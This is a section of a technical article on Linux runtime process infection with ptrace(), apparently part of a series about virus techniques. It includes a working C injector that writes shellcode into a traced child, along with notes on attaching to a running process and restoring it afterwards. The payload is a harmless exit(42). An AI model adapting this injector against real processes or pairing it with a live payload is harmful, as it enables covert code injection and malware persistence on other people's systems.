Next: The Algorithm
Up: Linux Improvised Userland Scheduler
Previous: Improvising a Userland Scheduler
Contents
Runtime Process Infection

Runtime infection is done using the notorious ptrace() syscall, which lets one process attach to another and take control of it. Attaching is subject to permission checks: the tracer needs root privileges (CAP_SYS_PTRACE) or, roughly, the same user ID as the target, the simplest case being a parent-child relationship in which the child asks to be traced with PTRACE_TRACEME; there are exceptions in both directions (a non-dumpable target cannot be attached by an unprivileged tracer, and kernels with the Yama LSM restrict PTRACE_ATTACH further depending on ptrace_scope). Once the traced process has stopped under the tracer's control, the tracer can read and modify its registers and read from and write to its address space. These are exactly the features needed to slip in the virus code and activate it: write the code into the target's memory, point its instruction pointer at it, and resume the process. For an in-depth review of the ptrace() injection method, refer to the "Building ptrace Injecting Shellcodes" article in Phrack 59 [1].
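The attach, register read, memory write, register rewrite, resume sequence described above, as an added example that is not code from the article or from the Phrack 59 paper it cites. To run unprivileged it forks a child that volunteers with PTRACE_TRACEME instead of attaching to a foreign pid, and the injected code is a raw exit(42) rather than a virus body, so the tracer can confirm the payload executed. It assumes Linux on x86-64 or aarch64 and uses only the ptrace requests documented in ptrace(2); the function and variable names are my own.

```c
/* Added example, not from the original article: minimal ptrace() code injector.
 * Assumes Linux x86-64 or aarch64. */
#define _GNU_SOURCE
#include <elf.h>
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/uio.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed payload: raw exit(42), so the tracer can verify it ran.  A real
 * infector would drop a stub that maps space for the virus body and jumps to it. */
#if defined(__x86_64__)
static const uint8_t payload[16] = {
    0xbf, 0x2a, 0x00, 0x00, 0x00,   /* mov edi, 42         */
    0xb8, 0x3c, 0x00, 0x00, 0x00,   /* mov eax, 60 (exit)  */
    0x0f, 0x05,                     /* syscall             */
    0x90, 0x90, 0x90, 0x90          /* nop padding to 16 B */
};
#elif defined(__aarch64__)
static const uint8_t payload[16] = {
    0x40, 0x05, 0x80, 0xd2,         /* mov x0, #42         */
    0xa8, 0x0b, 0x80, 0xd2,         /* mov x8, #93 (exit)  */
    0x01, 0x00, 0x00, 0xd4,         /* svc #0              */
    0x1f, 0x20, 0x03, 0xd5          /* nop padding         */
};
#else
#error "this example supports Linux x86-64 and aarch64 only"
#endif

/* Read the tracee's registers and report its program counter. */
static int get_regs(pid_t pid, struct user_regs_struct *regs, unsigned long *pc)
{
#if defined(__x86_64__)
    if (ptrace(PTRACE_GETREGS, pid, NULL, regs) == -1) return -1;
    *pc = regs->rip;
#else
    struct iovec iov = { regs, sizeof *regs };
    if (ptrace(PTRACE_GETREGSET, pid, (void *)(uintptr_t)NT_PRSTATUS, &iov) == -1) return -1;
    *pc = regs->pc;
#endif
    return 0;
}

/* Point the tracee's program counter at pc and write the registers back. */
static int set_pc(pid_t pid, struct user_regs_struct *regs, unsigned long pc)
{
#if defined(__x86_64__)
    regs->rip = pc;
    return (int)ptrace(PTRACE_SETREGS, pid, NULL, regs);
#else
    struct iovec iov = { regs, sizeof *regs };
    regs->pc = pc;
    return (int)ptrace(PTRACE_SETREGSET, pid, (void *)(uintptr_t)NT_PRSTATUS, &iov);
#endif
}

/* Copy len bytes (a multiple of sizeof(long)) into the tracee's text, one word per
 * PTRACE_POKETEXT.  This works on read-only pages: the tracee gets a private copy. */
static int write_text(pid_t pid, unsigned long addr, const uint8_t *buf, size_t len)
{
    for (size_t off = 0; off < len; off += sizeof(long)) {
        long word;
        memcpy(&word, buf + off, sizeof word);
        if (ptrace(PTRACE_POKETEXT, pid, (void *)(addr + off), (void *)word) == -1)
            return -1;
    }
    return 0;
}

/* Fork a tracee, inject the payload at its current program counter and resume it.
 * Returns the tracee's exit status (42 when the injected code ran), or -1 with errno
 * set; EPERM means tracing is not permitted here (Yama ptrace_scope, seccomp, ...). */
int inject_demo(void)
{
    int status;
    pid_t pid = fork();
    if (pid == -1) return -1;
    if (pid == 0) {
        /* Tracee: ask to be traced, then stop so the tracer can operate on us. */
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1) _exit(1);
        raise(SIGSTOP);
        for (;;) pause();   /* never reached if the injection worked */
    }
    if (waitpid(pid, &status, 0) == -1) return -1;
    if (!WIFSTOPPED(status)) { errno = EPERM; return -1; }   /* TRACEME was refused */
    struct user_regs_struct regs;
    unsigned long pc;
    if (get_regs(pid, &regs, &pc) == -1 ||
        write_text(pid, pc, payload, sizeof payload) == -1 ||
        set_pc(pid, &regs, pc) == -1 ||
        ptrace(PTRACE_CONT, pid, NULL, NULL) == -1) {      /* sig 0: swallow SIGSTOP */
        int saved = errno;
        kill(pid, SIGKILL); waitpid(pid, NULL, 0);
        errno = saved;
        return -1;
    }
    if (waitpid(pid, &status, 0) == -1) return -1;
    if (!WIFEXITED(status)) { errno = EIO; return -1; }
    return WEXITSTATUS(status);
}

int main(void)
{
    int rc = inject_demo();
    if (rc == -1) perror("inject_demo");
    else printf("tracee exited with status %d\n", rc);
    return rc == 42 ? 0 : 1;
}
```

To infect a running process rather than a child, replace the fork/PTRACE_TRACEME pair with PTRACE_ATTACH on the target pid followed by a waitpid() for the attach stop; everything from get_regs() onward is the same. An infector that wants the host to keep running (as the virus in this article does) also saves the original registers and the overwritten bytes, and restores both with PTRACE_SETREGS/PTRACE_POKETEXT before detaching, which is the part of the technique the Phrack 59 article covers in detail.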